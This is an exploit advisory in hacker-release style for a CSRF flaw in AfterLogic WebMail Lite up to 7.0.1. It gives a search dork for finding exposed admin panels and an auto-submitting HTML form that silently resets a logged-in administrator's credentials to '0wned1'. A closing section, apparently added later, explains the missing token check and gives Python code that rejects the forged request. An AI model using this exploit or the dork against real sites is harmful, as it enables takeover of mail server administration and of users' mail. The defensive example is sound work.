
#########################################################################

[+] Exploit Title : AfterLogic WebMail Lite PHP CSRF
[+] Author : Pablo '7days' Riberio
[+] Team: So Good Security
[+] Other 0days : http://pastebin.com/u/7days
[+] Version : <= 7.0.1
[+] Tested on : windows/internet explorer
[+] Details: Reset admin password via CSRF
[+] Vendor: http://www.afterlogic.org/
[+] Duck : inurl:webmail/adminpanel/index.php?submit

#########################################################################


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz: Greg, Sonya from Mortal Kombat, the owner of the Japanese steak creation factory,
my home boy linus, all the cockneys and my grandma <3

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
no thnx 2: microsoft, windoz, estate agents, all the script kiddies and recruiters

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
`..`.:::.`
.://o:::///:.
`::+y+::::::/+/`
:/++/::/:/--:+o:`
`://:-:/-/:.-:/oo.
`/-.-:::/o---::+o.
....-:/+hs::--:+o
.``-//ohh+----:+.
`.``-/+syhs:----/+`
.-.`.-:+syyo:--.-:+/
`---.`.-/+yo/:-----:+o.
.::-...-:+/o/-.-----:+so`
.-::-...-:::::-----:://osy:
.::-....--:::----::/+ooosys-
`:--.....-:/:::::/+osyyyyo:`
` `----...--:/++++oosyyhhy+-`
:::::-------:::---..--:/+oossyyhhhhs/.
::::::-------:--.-.--:+osyyyhhhhho-`
------------.....--:/+oyyhhhhhy+.
-----------...---:/+osyhhhhyo:`
:::::-------:::/+osyyhhhhs/.
++++++++++++oossyyhhhhs/.
sssssssyyyyhhhhhhhyo:.`
``..---..`

portuguese cyber army

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] Begin 0day

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

<html>
<head>
</head>
<body>
<!-- AfterLogic WebMail Lite PHP 7.0.1 csrf -->
<!-- The admin panel's password form accepts this POST with only the victim's session cookie
     as proof of intent: no anti-CSRF token, so a page the logged-in admin merely visits can
     submit it. The script below auto-submits the form as soon as the page loads. -->
<form action="http://www.victim.com/webmail/adminpanel/index.php?submit" method="POST" id="csrf" name="csrf" onload="go()">
<input type="hidden" name="form_id" value="security" />
<input type="hidden" name="txtUserName" value="0wned1" />
<input type="hidden" name="txtNewPassword" value="0wned1" />
<input type="hidden" name="txtConfirmNewPassword" value="0wned1" />
<input type="submit" name="submit_btn" value="Save" />
</form>
<script language="JavaScript" type="text/javascript">
document.csrf.submit();
</script>
</body>

</html>


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[+] End 0day

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
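The request the PoC fires carries the admin's session cookie but nothing that proves it came from the admin panel itself. As an added example (not AfterLogic's code; the field names come from the form above, while `csrf_token`, the handler names and the attacker host are assumptions), here is the server-side check that would reject it: a per-session synchronizer token plus an Origin/Referer check.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Origin of the admin panel (host taken from the PoC above); constructed for this example.
ADMIN_ORIGIN = "http://www.victim.com"
# session id -> CSRF token; an in-memory stand-in for server-side session storage.
SESSION_TOKENS = {}

def issue_token(session_id):
    """Create a per-session synchronizer token to embed as a hidden field in the admin form."""
    token = secrets.token_hex(32)
    SESSION_TOKENS[session_id] = token
    return token

def same_origin(headers):
    """Origin (or, failing that, Referer) must match the admin panel; absent headers count as cross-site."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    parts = urlsplit(src)
    return f"{parts.scheme}://{parts.netloc}" == ADMIN_ORIGIN

def handle_password_change(session_id, headers, form):
    """Validate a POST to index.php?submit with form_id=security. Returns (ok, reason)."""
    if form.get("form_id") != "security":
        return False, "not a security form"
    if not same_origin(headers):
        return False, "cross-site request"
    expected = SESSION_TOKENS.get(session_id)
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid CSRF token"
    if form.get("txtNewPassword") != form.get("txtConfirmNewPassword"):
        return False, "password confirmation mismatch"
    # A real handler would also require the current password before persisting the change.
    return True, "password updated"

# Constructed request shaped like the PoC: the victim's session cookie rides along, but the
# form carries no token and the browser's Origin points at the attacker's page.
POC_HEADERS = {"Origin": "http://attacker.example"}
POC_FORM = {"form_id": "security", "txtUserName": "0wned1", "txtNewPassword": "0wned1",
            "txtConfirmNewPassword": "0wned1", "submit_btn": "Save"}

if __name__ == "__main__":
    sid = "admin-session"
    print(handle_password_change(sid, POC_HEADERS, POC_FORM))           # rejected
    legit = dict(POC_FORM, csrf_token=issue_token(sid))
    print(handle_password_change(sid, {"Origin": ADMIN_ORIGIN}, legit))  # accepted
```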